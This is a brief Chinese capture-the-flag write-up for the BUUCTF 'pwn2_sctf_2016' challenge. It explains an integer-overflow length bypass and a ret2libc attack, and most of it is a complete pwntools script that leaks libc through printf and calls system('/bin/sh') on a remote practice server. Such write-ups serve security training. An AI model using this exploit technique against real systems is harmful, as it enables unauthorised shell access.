1.chwcksec
2.IDA
无符号Int,输入-1进行溢出 ,绕过长度限制
利用printf函数泄露libc,利用system('bin/sh')
3.EXP
from pwn import *
from LibcSearcher import *
r=remote("node4.buuoj.cn",27523)
elf=ELF('./pwn2_sctf_2016')
printf_plt=elf.plt['printf']
printf_got=elf.got['printf']
main=elf.sym['main']
r.recvuntil('How many bytes do you want me to read? ')
r.sendline('-1')
r.recvuntil('\n')
payload='a'*(0x2c+4)+p32(printf_plt)+p32(main)+p32(printf_got)
r.sendline(payload)
r.recvuntil('\n')
printf_addr=u32(r.recv(4))
libc=LibcSearcher('printf',printf_addr)
offset=printf_addr-libc.dump('printf')
system=offset+libc.dump('system')
bin_sh=offset+libc.dump('str_bin_sh')
r.recvuntil('How many bytes do you want me to read? ')
r.sendline('-1')
r.recvuntil('\n')
payload='a'*(0x2c+4)+p32(system)+p32(main)+p32(bin_sh)
r.sendline(payload)
r.interactive()
在读入的时候输入-1,具体交互